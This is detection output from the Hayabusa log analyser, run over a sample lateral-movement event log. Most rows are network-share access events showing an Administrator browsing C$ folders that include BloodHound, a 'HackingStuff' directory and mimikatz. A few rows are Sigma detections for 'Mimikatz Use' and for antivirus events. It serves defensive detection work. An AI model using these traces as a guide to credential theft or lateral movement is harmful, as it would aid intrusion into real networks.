2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\HackingStuff  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\HackingStuff\logs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\mimikatz_trunk  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\mimikatz_trunk\Win32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\mimikatz_trunk\x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
